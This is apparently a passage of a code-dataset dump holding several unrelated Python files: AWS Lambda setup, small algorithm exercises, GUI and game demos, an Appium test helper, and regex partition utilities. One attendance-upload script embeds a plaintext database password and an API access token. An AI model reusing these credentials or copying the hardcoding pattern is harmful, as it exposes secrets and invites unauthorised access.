Handler='lambdafunc_scoring.scoring_lambda_handler',\r\n Code={\r\n 'ZipFile': function_zipfile,\r\n },\r\n Timeout=899,\r\n MemorySize=128,\r\n Environment={\r\n 'Variables': {\r\n 'fallback_modelname': model_imagename,\r\n 'fallback_clustername': aws_eks_cluster_name,\r\n 'fallback_ingress_url' : ingress_controller_url,\r\n 's3_outputfolder': s3folderout_lambda,\r\n 'aws_region': aws_region,\r\n 'k8s_namespace' : k8s_namespace\r\n }\r\n },\r\n Layers=[lambda_layer_arn_version]\r\n )\r\n functionArn = response['FunctionArn']\r\n\r\n response = lambda_client.add_permission(\r\n FunctionName=functionArn,\r\n StatementId='1',\r\n Action='lambda:InvokeFunction',\r\n Principal='s3.amazonaws.com'\r\n )\r\n return functionArn\r\n\r\n except ClientError as e:\r\n print(\"Error creating lambda function:\", e)\r\n return None\r\n\r\n\r\ndef _create_s3bucket_notificationfunc(awsconfig, lambdaconfig, s3folderin_lambda, functionArn):\r\n parsed = urlparse(s3folderin_lambda, allow_fragments=False)\r\n bucketin = parsed.netloc\r\n s3prefix = parsed.path.lstrip('/')\r\n\r\n lambda_function_name = lambdaconfig['lambda_function_name']\r\n\r\n try:\r\n s3_client = boto3.client('s3', aws_access_key_id=awsconfig['aws_access_key_id'],\r\n 
aws_secret_access_key=awsconfig['aws_secret_access_key'])\r\n response = s3_client.put_bucket_notification_configuration(\r\n Bucket=bucketin,\r\n NotificationConfiguration={\r\n 'LambdaFunctionConfigurations': [\r\n {\r\n 'Id': lambda_function_name,\r\n 'LambdaFunctionArn': functionArn,\r\n 'Events': [\r\n 's3:ObjectCreated:*'\r\n ],\r\n 'Filter': {\r\n 'Key': {\r\n 'FilterRules': [\r\n {\r\n 'Name': 'prefix', 'Value': s3prefix\r\n },\r\n {\r\n 'Name': 'suffix', 'Value': '.csv'\r\n }\r\n ]\r\n }\r\n }\r\n }\r\n ]\r\n }\r\n )\r\n print(\"Event Notification created on S3 Input bucket that invokes above Lambda Function\", bucketin)\r\n except ClientError as e:\r\n print(\"Error creating event notification configuration on s3 bucket:\", e)\r\n return None\r\n # except Exception as e:\r\n # print(str(e))\r\n # raise e\r\n\r\n\r\ndef create_lambda_setup(awsconfig,lambdaconfig, k8sconfig, model_imagename, s3folderin_lambda, s3folderout_lambda):\r\n functionArn = _create_lambda_function(awsconfig, lambdaconfig, k8sconfig, model_imagename, s3folderin_lambda, s3folderout_lambda)\r\n print(\"Lambda Function created functionArn:\", functionArn)\r\n _create_s3bucket_notificationfunc(awsconfig, lambdaconfig, s3folderin_lambda, functionArn)\r\n\r\n\r\n######\r\n\r\ndef _delete_s3bucket_notificationfunc(awsconfig, s3folderin_lambda):\r\n parsed = urlparse(s3folderin_lambda, allow_fragments=False)\r\n bucketin = parsed.netloc\r\n try:\r\n # delete by saving an empty notification configuration.\r\n s3_client = boto3.client('s3', aws_access_key_id=awsconfig['aws_access_key_id'],\r\n aws_secret_access_key=awsconfig['aws_secret_access_key'])\r\n response = s3_client.put_bucket_notification_configuration(\r\n Bucket=bucketin,\r\n NotificationConfiguration={\r\n }\r\n )\r\n print(\"Deleted ALL Event notification configurations on bucket \", bucketin)\r\n except ClientError as e:\r\n print(\"Error creating event notification configuration on s3 bucket:\", e)\r\n return None\r\n # except Exception as e:\r\n # print(str(e))\r\n # raise e\r\n\r\n\r\ndef _delete_lambda_function(awsconfig, lambdaconfig):\r\n lambda_function_name = lambdaconfig['lambda_function_name']\r\n\r\n try:\r\n lambda_client = boto3.client('lambda', aws_access_key_id=awsconfig['aws_access_key_id'],\r\n aws_secret_access_key=awsconfig['aws_secret_access_key'])\r\n response = lambda_client.delete_function(FunctionName=lambda_function_name)\r\n\r\n # do not delete layer here. see why @ https://stackoverflow.com/questions/60824745/aws-delete-lambda-layer-still-retains-layer-version-history/61103244#61103244\r\n\r\n return True\r\n\r\n except ClientError as e:\r\n print(\"Error creating lambda function or layer:\", e)\r\n return None\r\n\r\n\r\ndef delete_lambda_setup(awsconfig, lambdaconfig, s3folderin_lambda):\r\n _delete_s3bucket_notificationfunc(awsconfig,s3folderin_lambda) # deletes all notifications. Bad. 
Restricting to folder prefix is not provided by AWS SDK.\r\n _delete_lambda_function(awsconfig, lambdaconfig)\r\n","repo_name":"nallagangus/sasmm_modops","sub_path":"awsdest/utils/core_aws_lambda.py","file_name":"core_aws_lambda.py","file_ext":"py","file_size_in_byte":10768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38526357936","text":"# 11725_트리의부모찾기_find-parent-tree\n\nN = int(input())\n\nadjL = [[] for _ in range(N+1)]\nparent = [0]*(N+1)\nvisited = [0]*(N+1)\nfor _ in range(N-1):\n n1, n2 = map(int, input().split())\n adjL[n1].append(n2)\n adjL[n2].append(n1)\n\nstack = [1]\n\nwhile stack:\n node = stack.pop()\n visited[node] = 1\n for c in adjL[node]:\n if not visited[c]:\n stack.append(c)\n parent[c] = node\n visited[c] = 1\n\nfor i in range(2, N+1):\n print(parent[i])\n\n","repo_name":"MinWoongL/Algorithm_Study","sub_path":"Baekjoon/gold_to_platinum_230215/11725_find-parent-tree.py","file_name":"11725_find-parent-tree.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22176328112","text":"from turtle import Turtle\nfrom random import randint\n\n\ndef move_snake(snake_head):\n if snake_head.direction == \"up\":\n snake_y_position = snake_head.ycor()\n snake_y_position += 20\n snake_head.sety(snake_y_position)\n if snake_head.direction == \"down\":\n snake_y_position = snake_head.ycor()\n snake_y_position -= 20\n snake_head.sety(snake_y_position)\n if snake_head.direction == \"right\":\n snake_x_position = snake_head.xcor()\n snake_x_position += 20\n snake_head.setx(snake_x_position)\n if snake_head.direction == \"left\":\n snake_x_position = snake_head.xcor()\n snake_x_position -= 20\n snake_head.setx(snake_x_position)\n\n\ndef make_turtle(turtle_shape, turtle_color):\n turtle_object = Turtle()\n turtle_object.shape(turtle_shape)\n turtle_object.color(turtle_color)\n turtle_object.speed(\"fastest\")\n turtle_object.penup()\n return turtle_object\n\n\ndef change_turtle_object_position_in_random_place(turtle_object):\n\n x = randint(-270, 270)\n y = randint(-270, 230)\n turtle_object.goto(x, y)\n\n\ndef reset(snake_head, snake_body):\n snake_head.goto(0, 0)\n snake_head.direction = \"\"\n for body in snake_body:\n body.ht()\n snake_body.clear()\n","repo_name":"mostafa-sadeghi/hadi_khodaei","sub_path":"snake_game_utils.py","file_name":"snake_game_utils.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18233554683","text":"# -*- coding: utf-8 -*-\n# Author:jiang\n# 2021/9/15 15:00\nimport inspect\nimport json\nimport logging\n\nimport yaml\nfrom appium.webdriver import WebElement\nfrom appium.webdriver.common.mobileby import MobileBy\nfrom appium.webdriver.webdriver import WebDriver\nfrom appium_xueqiu.page.wrapper import handle_black\n\nclass BasePage:\n _params={}\n logging.basicConfig(level=logging.INFO)\n #弹框处理的定位列表\n _black_list=[\n (MobileBy.XPATH,\"//*[@text='确定']\"),\n (MobileBy.XPATH, \"//*[@text='下次再说']\"),\n (MobileBy.XPATH, \"//*[@text='确认']\"),\n ]\n _max_num=3\n _error_num=0\n def __init__(self,driver:WebDriver = None):\n self._driver=driver\n def set_implicitly(self,time):\n self._driver.implicitly_wait(time)\n def screenshot(self,name):\n self._driver.save_screenshot(name)\n def finds(self,locator,value:str=None):\n elements:list #返回值是list\n if isinstance(locator, tuple):\n elements = 
self._driver.find_elements(*locator)\n else:\n elements = self._driver.find_elements(locator, value)\n return elements\n @handle_black\n def find(self,locator,value:str=None):\n # logging.info(locator)\n # logging.info(value)\n element:WebElement\n if isinstance(locator,tuple):\n element=self._driver.find_element(*locator)\n else:\n element=self._driver.find_element(locator,value)\n return element\n @handle_black\n def find_and_get_text(self,locator,value:str=None):\n element:WebElement\n if isinstance(locator,tuple):\n element_text=self._driver.find_element(*locator).text\n else:\n element_text=self._driver.find_element(locator,value).text\n return element_text\n def steps(self,path):\n with open(path,encoding=\"utf-8\") as f:\n name=inspect.stack()[1].function #获取当前被调用的函数名\n steps=yaml.safe_load(f)[name]\n #yaml文件内容进行参数化\n raw=json.dumps(steps)\n for key,value in self._params.items():\n raw=raw.replace(f'${{{key}}}',value) #f语法 {{}}转义 -> 代表{} {key}:变量名称\n #raw = raw.replace('${'+key+'}', value) 与上面等价\n steps=json.loads(raw)\n for step in steps:\n if \"action\" in step.keys():\n action=step[\"action\"]\n if \"click\"==action:\n self.find(step[\"by\"], step[\"locator\"]).click()\n if \"send\"==action:\n self.find(step[\"by\"], step[\"locator\"]).send_keys(step[\"value\"])\n if \"len > 0\" ==action:\n eles=self.finds(step[\"by\"],step[\"locator\"])\n return len(eles)>0\n","repo_name":"jiangdeping/PyTestProject","sub_path":"appium_xueqiu/page/base_page.py","file_name":"base_page.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"752858769","text":"from Tkinter import *\n\nclass Application(Frame):\n\n\tdef __init__(self, master):\n\t\tFrame.__init__(self, master)\n\t\tself.grid()\n\t\tself.create_widgets()\n\n\tdef create_widgets(self):\n\t\tLabel(self, \n\t\t\t text = \"Choose your favorite movie genres\"\n\t\t\t ).grid(row = 0, column = 0, sticky = W)\n\n\t\tLabel(self, \n\t\t\t text = \"Select all that apply\"\n\t\t\t ).grid(row = 1, column = 0, sticky = W)\n\n\t\tself.favorite = StringVar()\n\t\t\n\t\t# Default select one of the things so that they arent all checked\n\t\tself.favorite.set(\"comedy.\")\n\n\t\tRadiobutton(self,\n\t\t\t\t\ttext = \"Comedy\",\n\t\t\t\t\tvariable = self.favorite,\n\t\t\t\t\tvalue = \"comedy.\",\n\t\t\t\t\tcommand = self.update_text\n\t\t\t\t\t).grid(row = 2, column = 0, sticky = W)\n\n\t\tRadiobutton(self,\n\t\t\t\t\ttext = \"Drama\",\n\t\t\t\t\tvariable = self.favorite,\n\t\t\t\t\tvalue = \"drama.\",\n\t\t\t\t\tcommand = self.update_text\n\t\t\t\t\t).grid(row = 3, column = 0, sticky = W)\n\n\t\tRadiobutton(self,\n\t\t\t\t\ttext = \"Romance\",\n\t\t\t\t\tvariable = self.favorite,\n\t\t\t\t\tvalue = \"romance.\",\n\t\t\t\t\tcommand = self.update_text\n\t\t\t\t\t).grid(row = 4, column = 0, sticky = W)\n\t\tself.result = Text(self,\n\t\t\t\t\t\t width = 40,\n\t\t\t\t\t\t height = 5,\n\t\t\t\t\t\t wrap = WORD)\n\t\tself.result.grid(row = 5, column = 0)\n\n\tdef update_text(self):\n\t\tmessage = \"Your favorite type of movie is %s\" % self.favorite.get()\n\t\tself.result.delete(0.0, END)\n\t\tself.result.insert(0.0, message)\n\nroot = Tk()\nroot.title(\"Check Button Tests\")\nroot.geometry(\"400x200\")\n\napp = 
Application(root)\nroot.mainloop()","repo_name":"vchan418/pythonGUI","sub_path":"radio_buttons.py","file_name":"radio_buttons.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30656079674","text":"# Exercise 16 of \"Learn Python3 the Hard Way\"\n# Reading and Writing Files\n#\n# close(), read(), readline(), truncate(), write(\"stuff\"), seek(0)\n# open mode: r, r+, w, w+, a, a+\n# seek(0) moving the file handle position to the beginning of the file.\n\nfrom sys import argv\n\nscript, filename = argv\n\nprint(f\"We're going to erase {filename}.\")\nprint(\"If you don't want that, hit Ctrl-C (^C).\")\nprint(\"If you do want that, hit RETURN.\")\n\ninput(\"?\")\n\nprint(\"Opening the file...\")\ntarget = open(filename, \"w\")\n\nprint(\"Truncating the file. Goodbye!\")\ntarget.truncate()\n\nprint(\"Now I'm going to ask you for three lines.\")\n\nline1 = input(\"line 1: \")\nline2 = input(\"line 2: \")\nline3 = input(\"line 3: \")\n\nprint(\"I'm going to write these to the file.\")\n\ntarget.write(line1)\ntarget.write(\"\\n\")\ntarget.write(line2)\ntarget.write(\"\\n\")\ntarget.write(line3)\ntarget.write(\"\\n\")\n\nprint(\"And finally, we close it.\")\ntarget.close()\n\n# Practice\nprint(\"\\n# Practice #\")\n# target = open(filename, \"r+\")\n# txt1 = target2.read() ## wrong statement\ntarget = open(filename, \"a+\")\n# seek(0) moving the file handle position to the beginning of the file.\ntarget.seek(0)\nprint(\"\\nRead Again!\\n{}\".format(target.read()))\n\nlines = (\n \" === below are added by Practice===\\n \"\n + line1\n + \"\\n \"\n + line2\n + \"\\n \"\n + line3\n + \"\\n \"\n)\ntarget.write(lines)\n\ntarget.seek(0)\nprint(\"\\nRead One More Time!\\n{}\".format(target.read()))\n\ntarget.close()\n","repo_name":"TomFoxLee/Python543","sub_path":"LPY3THW/ex16.py","file_name":"ex16.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"121660943","text":"import mysql.connector\nimport json\nimport urllib3\n\n\ndef sendBiometrias(pessoa):\n url = 'http://200.18.32.62:8070/siot/webservice/carga/salvePresencas'\n http = urllib3.PoolManager(\n headers={\n 'X-UFSM-Access-Token': \"e115a01f0829cca9958dc06ac3c8e2abca742c7b7c6cbdf1f492fc2a72547bac\",\n 'X-UFSM-Device-ID': \"a85f34385350073a\",\n 'Content-Type': \"application/json\"\n })\n r = http.request('POST', url, body = pessoa)\n return r\n\nmydb = mysql.connector.connect(\n host=\"200.18.32.171\",\n user=\"root\",\n passwd=\"#iotcl@ss\",\n database=\"db_pi_teste\"\n)\n\nmycursor = mydb.cursor()\nsql = \"SELECT P.ID_PRESENCA, P.ID_ALUNO, P.PRESENTE, PT.ID_TURMA, \\\n T.DISCIPLINA, T.HORA_INICIO, T.HORA_FIM, T.DIA_SEMANA, PT.DATA \\\n FROM PRESENCA P INNER JOIN PRESENCA_TURMA PT \\\n INNER JOIN TURMA T ON PT.ID_PRESENCA = P.ID_PRESENCA AND T.ID_TURMA = PT.ID_TURMA\"\n\nmycursor.execute(sql)\nmyresult = mycursor.fetchall()\npb = list()\n\nfor x in myresult:\n turma = {\n 'disciplina': str(x[4]),\n 'horaInicio': str(x[5]),\n 'horaFim': str(x[6]),\n 'diaSemana': x[7]\n }\n\n presenca = {\n 'id': x[0],\n 'aluno': {'id': x[1]},\n 'presente': x[2]\n }\n\n ptc = {\n 'presenca': presenca,\n 'turma': turma,\n 'data': str(x[8])\n }\n\n pb.append(ptc)\n\nprint(pb)\njpess = json.dumps(pb)\nprint('status: ', sendBiometrias(jpess).status) # --> 
/webservice/carga/salveBiometrias\nprint(jpess)\n","repo_name":"moisesoliv/iclass-fog","sub_path":"backp.py","file_name":"backp.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7428575187","text":"\"\"\"\n The Tribonacci sequence Tn is defined as follows:\n\n T0 = 0, T1 = 1, T2 = 1, and Tn+3 = Tn + Tn+1 + Tn+2 for n >= 0.\n\n Given n, return the value of Tn.\n\"\"\"\ndef tribonacci(n):\n res = [0 for i in range(n + 1)]\n res[0] = 0\n res[1] = 1\n res[2] = 1\n\n for j in range(3, n + 1, 1):\n res[j] = sum(res[j - 3: j])\n\n return res[n]\n\n\nprint(f'tribonacci(4): {tribonacci(4)} ') #4\nprint(f'tribonacci(25): {tribonacci(25)} ') #1389537\n","repo_name":"ChristineGoGo/leetcode-problems","sub_path":"1137_n-th_tribonacci_number.py","file_name":"1137_n-th_tribonacci_number.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26815811553","text":"#!/usr/bin/env python3\n\n_license = \"\"\"\nbig\nCopyright 2022-2023 Larry Hastings\nAll rights reserved.\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the\nSoftware is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\nOTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR\nTHE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport enum\nimport functools\nimport itertools\nfrom itertools import zip_longest\nfrom .itertools import PushbackIterator\nfrom . 
import state\nimport math\nimport operator\nimport re\nimport struct\nimport sys\n\ntry:\n from re import Pattern as re_Pattern\nexcept ImportError: # pragma: no cover\n re_Pattern = re._pattern_type\n\ntry:\n import regex\n regex_Pattern = regex.Pattern\n def isinstance_re_pattern(o):\n return isinstance(o, (re_Pattern, regex_Pattern))\nexcept ImportError: # pragma: no cover\n regex_Pattern = re_Pattern\n def isinstance_re_pattern(o):\n return isinstance(o, re_Pattern)\n\n\n__all__ = []\n\ndef _export_name(s):\n __all__.append(s)\n\ndef _export(o):\n _export_name(o.__name__)\n return o\n\n\ndef _iterate_over_bytes(b):\n # this may not actually iterate over bytes.\n # for example, we iterate over apostrophes and double_quotes\n # for gently_title, and those might be strings or bytes,\n # or iterables of strings or bytes.\n if isinstance(b, bytes):\n return (b[i:i+1] for i in range(len(b)))\n return iter(b)\n\n\n@_export\ndef re_partition(s, pattern, count=1, *, flags=0, reverse=False):\n \"\"\"\n Like str.partition, but pattern is matched as a regular expression.\n\n s can be either a str or bytes object.\n\n pattern can be a str, bytes, or re.Pattern object.\n\n s and pattern (or pattern.pattern) must be the same type.\n\n If pattern is found in s, returns a tuple\n (before, match, after)\n where before is the text before the match,\n match is the re.Match object resulting from the match, and\n after is the text after the match.\n\n If pattern appears in s multiple times,\n re_partition will match against the first (leftmost)\n appearance.\n\n If pattern is not found in s, returns a tuple\n (s, None, '')\n where the empty string is str or bytes as appropriate.\n\n To convert the output into a tuple of strings like str.partition,\n use\n t = re_partition(...)\n t2 = (t[0], t[1].group(0) if t[1] else '', t[2])\n\n Passing in an explicit \"count\" lets you control how many times\n re_partition partitions the string. re_partition will always\n return a tuple containing (2*count)+1 elements, and\n odd-numbered elements will be either re.Match objects or None.\n Passing in a count of 0 will always return a tuple containing s.\n\n If pattern is a string or bytes, flags is passed in\n as the flags argument to re.compile.\n\n If reverse is true, partitions starting at the right,\n like re_rpartition.\n\n You can pass in an instance of a subclass of bytes or str\n for s and pattern (or pattern.pattern), but the base class\n for both must be the same (str or bytes). 
re_partition will\n only return str or bytes objects.\n\n (In older versions of Python, re.Pattern was a private type called\n re._pattern_type.)\n \"\"\"\n if reverse:\n return re_rpartition(s, pattern, count, flags=flags)\n\n if isinstance(s, bytes):\n empty_string = b''\n extension = (None, b'')\n else:\n empty_string = ''\n extension = (None, '')\n\n if not isinstance_re_pattern(pattern):\n pattern = re.compile(pattern, flags=flags)\n\n # optimized fast path for the most frequent use case\n if count == 1:\n match = pattern.search(s)\n if not match:\n return (s, None, empty_string)\n before, separator, after = s.partition(match.group(0))\n return (before, match, after)\n\n if count == 0:\n return (s,)\n\n if count < 0:\n raise ValueError(\"count must be >= 0\")\n\n result = []\n extend = result.extend\n matches_iterator = pattern.finditer(s)\n\n try:\n for remaining in range(count, 0, -1):\n match = next(matches_iterator)\n before, separator, s = s.partition(match.group(0))\n extend((before, match))\n extension = ()\n except StopIteration:\n extension *= remaining\n\n result.append(s)\n return tuple(result) + extension\n\n@_export\ndef reversed_re_finditer(pattern, string, flags=0):\n \"\"\"\n An iterator. Behaves almost identically to the Python\n standard library function re.finditer, yielding non-overlapping\n matches of \"pattern\" in \"string\". The difference is,\n reversed_re_finditer searches \"string\" from right to left.\n\n pattern can be str, bytes, or a precompiled re.Pattern object.\n If it's str or bytes, it'll be compiled with re.compile using\n the flags you passed in.\n\n string should be the same type as pattern (or pattern.pattern).\n \"\"\"\n if not isinstance_re_pattern(pattern):\n pattern = re.compile(pattern, flags=flags)\n\n def reversed_re_finditer(pattern, string):\n # matches are found by re.search *going forwards.*\n # but what we need here is the *reverse* matches.\n #\n # consider this call:\n # re_rpartition('abcdefgh', '(abcdef|efg|ab|b|c|d)', count=4)\n #\n # re.finditer with that string and pattern yields one match:\n # 'abcdef'\n # but reverse searching, e.g. with\n # regex.finditer(flags=regex.REVERSE), yields four matches:\n # 'efg', 'd', 'c', 'ab'\n #\n # so what we do is: we ask re.finditer for all the forward\n # matches. then, for every match it found, we check every\n # overlapping character to see if there's a different match\n # there that we might prefer. if we prefer one of those,\n # we yield that--but we keep around the other matches,\n # because one of those (or a truncated version of it) might\n # also work.\n\n\n # matches and overlapping_matches are lists of 3-tuples of:\n # (end_pos, -start_pos, match)\n # if we sort the list, the last element will be the correct\n # last match in \"reverse\" order. see\n # https://en.wikipedia.org/wiki/Schwartzian_transform\n #\n # matches contains the list of matches we got directly from\n # re.finditer(), reversed. since this was found using re in\n # \"forward\" order, we need to check every match in this list\n # for potential overlapping matches.\n matches = [(match.end(), -match.start(), match) for match in pattern.finditer(string)]\n if not matches:\n # print(f\"no matches at all! 
exiting immediately.\")\n return\n\n # Does this pattern match zero-length strings?\n zero_length_match = pattern.match(string, 0, 0)\n if zero_length_match:\n # This pattern matches zero-length strings.\n # Since the rules are a little different for\n # zero-length strings when in reverse mode,\n # we need to doctor the match results a little.\n\n # These seem to be the rules:\n #\n # In forwards mode, we consider two matches to overlap\n # if they start at the same position, or if they have\n # any characters in common. There's an implicit\n # zero-length string at the beginning and end of every\n # string, so if the pattern matches against a zero-length\n # string at the start or end, and there isn't another\n # (longer) match that starts at that position, we'll\n # yield these matches too. Since only a zero-length\n # match can start at position len(string), we'll always\n # yield a zero-length match starting and ending at\n # position length(string) if the pattern matches there.\n #\n # In reverse mode, we consider two matches to overlap\n # if they end at the same position, or if they have any\n # characters in common with any other match. There's an\n # implicit zero-length string at the beginning and end of\n # every string, so if the pattern matches a zero-length\n # string at the start or end, and there isn't another\n # (longer) match that ends at that position, we'll yield\n # these matches too. Since only a zero-length match can\n # end at position 0, we'll always yield a zero-length\n # match starting and ending at position 0 if the pattern\n # matches there.\n\n # We need to ensure that, for every non-zero-length match,\n # if the pattern matches a zero-length string starting at\n # the same position, we have that zero-length match in\n # matches too.\n #\n # So specifically we're going to do this:\n #\n # for every match m in matches:\n # if m has nonzero length,\n # and the pattern matches a zero-length string\n # starting at m,\n # ensure that the zero-length match is also in matches.\n # elif m has zero length,\n # if we've already ensured that a zero-length\n # match starting at m.start() is in matches,\n # discard m.\n\n zeroes = set()\n new_matches = []\n append = new_matches.append\n last_start = -1\n for t in matches:\n match = t[2]\n start, end = match.span()\n\n if start not in zeroes:\n if (start == end):\n append(t)\n zeroes.add(start)\n continue\n\n zero_match = pattern.match(string, start, start)\n if zero_match:\n t_zero_length = (start, -start, zero_match)\n append(t_zero_length)\n zeroes.add(start)\n append(t)\n # del zeroes\n matches = new_matches\n\n matches.sort()\n\n # overlapping_matches is a list of the possibly-viable\n # overlapping matches we found from checking a match\n # we got from \"matches\".\n overlapping_matches = []\n\n result = []\n match = None\n\n # We truncate each match at the start\n # of the previously yielded match.\n #\n # The initial value allows the initial match\n # to extend all the way to the end of the string.\n previous_match_start = len(string)\n\n # cache some method lookups\n pattern_match = pattern.match\n append = overlapping_matches.append\n\n while True:\n if overlapping_matches:\n # overlapping_matches contains the overlapping\n # matches found *last* time around, before we\n # yielded the most recent match.\n #\n # The thing is, some of these matches might overlap that match.\n # But we only yield *non*-overlapping matches. 
So we need to\n # filter the matches in overlapping_matches accordingly.\n\n truncated_matches = []\n # (overlapping_matches will be set to truncated_matches in a few lines)\n append = truncated_matches.append\n\n for t in overlapping_matches:\n end, negated_start, match = t\n start = -negated_start\n if start > previous_match_start:\n # This match starts *after* the previous match started.\n # All matches starting at this position are no longer\n # viable. Throw away the match.\n continue\n if end <= previous_match_start:\n # This match ends *before* the previous match started.\n # In other words, this match is still 100% viable.\n # Keep it, we don't need to change it at all.\n append(t)\n continue\n\n # This match starts before the previous match started,\n # but ends after the previous match start.\n # In other words, it overlaps the previous match.\n #\n # So this match is itself no longer viable. But!\n # There might be a *different* match starting at this\n # position in the string. So we do a fresh re.match here,\n # stopping at the start of the previously yielded match.\n # (That's the third parameter, \"endpos\".)\n\n match = pattern_match(string, start, previous_match_start)\n if match:\n append((match.end(), -start, match))\n\n overlapping_matches = truncated_matches\n\n if (not overlapping_matches) and matches:\n # We don't currently have any pre-screened\n # overlapping matches we can use.\n #\n # But we *do* have a match (or matches) found in forwards mode.\n # Grab the next one that's still viable.\n\n scan_for_overlapping_matches = False\n while matches:\n t = matches.pop()\n end, negated_start, match = t\n start = -negated_start\n if end <= previous_match_start:\n assert start <= previous_match_start\n append(t)\n start += 1\n scan_for_overlapping_matches = True\n break\n\n if scan_for_overlapping_matches:\n # We scan every** position inside the match for an\n # overlapping match. All the matches we find go in\n # overlapping_matches, then we sort it and yield\n # the last one.\n #\n # ** We don't actually need to check the *first* position,\n # \"start\", because we already know what we'll find:\n # the match that we got from re.finditer() and\n # scanned for overlaps.\n #\n # As mentioned, the match we got from finditer\n # is viable here, so add it to the list.\n\n end = min(end, previous_match_start)\n for pos in range(start, end):\n match = pattern_match(string, pos, previous_match_start)\n if match:\n # print(f\" found {match=}\")\n append((match.end(), -pos, match))\n\n if not overlapping_matches:\n # matches and overlapping matches are both empty.\n # We've exhausted the matches. 
Stop iterating.\n return\n\n # overlapping_matches is now guaranteed current and non-empty.\n # We sort it so the rightmost match is last, and yield that.\n overlapping_matches.sort()\n match = overlapping_matches.pop()[2]\n previous_match_start = match.start()\n yield match\n return reversed_re_finditer(pattern, string)\n\n\n@_export\ndef re_rpartition(s, pattern, count=1, *, flags=0):\n \"\"\"\n Like str.rpartition, but pattern is matched as a regular expression.\n\n s can be a string or a bytes object.\n\n pattern can be a string, bytes, or an re.Pattern object.\n\n s and pattern (or pattern.pattern) must be the same type.\n\n If pattern is found in s, returns a tuple\n (before, match, after)\n where before is the text before the match,\n match is the re.Match object resulting from the match, and\n after is the text after the match.\n\n re_rpartition searches for pattern in s from right\n to left, and partitions at the non-overlapping\n matches it finds.\n\n If pattern matches multiple substrings of s, re_partition\n will match against the last (rightmost) appearance.\n\n If pattern is not found in s, returns a tuple\n ('', None, s)\n where the empty string is str or bytes as appropriate.\n\n To convert the output into a tuple of strings like str.rpartition,\n use\n t = re_rpartition(...)\n t2 = (t[0], t[1].group(0) if t[1] else '', t[2])\n\n Passing in an explicit \"count\" lets you control how many times\n re_rpartition partitions the string. re_rpartition will always\n return a tuple containing (2*count)+1 elements, and\n odd-numbered elements will be either re.Match objects or None.\n Passing in a count of 0 will always return a tuple containing s.\n\n If pattern is a string, flags is passed in\n as the flags argument to re.compile.\n\n You can pass in an instance of a subclass of bytes or str\n for s and pattern (or pattern.pattern), but the base class\n for both must be the same (str or bytes). re_rpartition will\n only return str or bytes objects.\n\n You can pass in a regex Pattern object (see the PyPi 'regex'\n package). 
Patterns using the \"Reverse Searching\" feature\n of 'regex' (the REVERSE flag or the '(?r)' token) are unsupported.\n\n (In older versions of Python, re.Pattern was a private type called\n re._pattern_type.)\n \"\"\"\n if isinstance(s, bytes):\n empty_string = b''\n extension = (b'', None)\n else:\n empty_string = ''\n extension = ('', None)\n\n # optimized fast path for the most frequent use case\n if count == 1:\n matches_iterator = reversed_re_finditer(pattern, s, flags)\n try:\n match = next(matches_iterator)\n before, separator, after = s.rpartition(match.group(0))\n return (before, match, after)\n except StopIteration:\n return (empty_string, None, s)\n\n if count == 0:\n return (s,)\n\n if count < 0:\n raise ValueError(\"count must be >= 0\")\n\n result = []\n extend = result.extend\n matches_iterator = reversed_re_finditer(pattern, s, flags)\n\n try:\n for remaining in range(count, 0, -1):\n match = next(matches_iterator)\n s, separator, after = s.rpartition(match.group(0))\n extend((after, match))\n extension = ()\n except StopIteration:\n extension *= remaining\n\n result.append(s)\n result.reverse()\n return extension + tuple(result)\n\n\n@_export\ndef _recursive_encode_strings(o, encoding):\n if isinstance(o, str):\n return o.encode(encoding)\n\n a = []\n if isinstance(o, dict):\n for k, v in o.items():\n k = _recursive_encode_strings(k, encoding)\n v = _recursive_encode_strings(v, encoding)\n a.append((k, v))\n else:\n for element in o:\n a.append(_recursive_encode_strings(element, encoding))\n return type(o)(a)\n\n@_export\ndef encode_strings(o, encoding='ascii'):\n \"\"\"\n Accepts a container object 'o' containing\n str objects; returns an equivalent object\n with the strings encoded to bytes.\n\n 'o' must be either dict, list, or tuple,\n or a subclass.\n\n Encodes every string inside using the encoding\n specified in the 'encoding' parameter, default\n is 'ascii'. Handles nested containers.\n\n If 'o' contains an object that is not a\n str, dict, list, or tuple, raises TypeError.\n \"\"\"\n if isinstance(o, str):\n raise TypeError('encode_strings only accepts tuple, list, or dict')\n return _recursive_encode_strings(o, encoding)\n\n\n# Tuples enumerating all the whitespace and newline characters,\n# for use with big functions taking \"separators\" arguments\n# (e.g. lines, multisplit). For an explanation of what they\n# represent, please see the \"Whitespace and 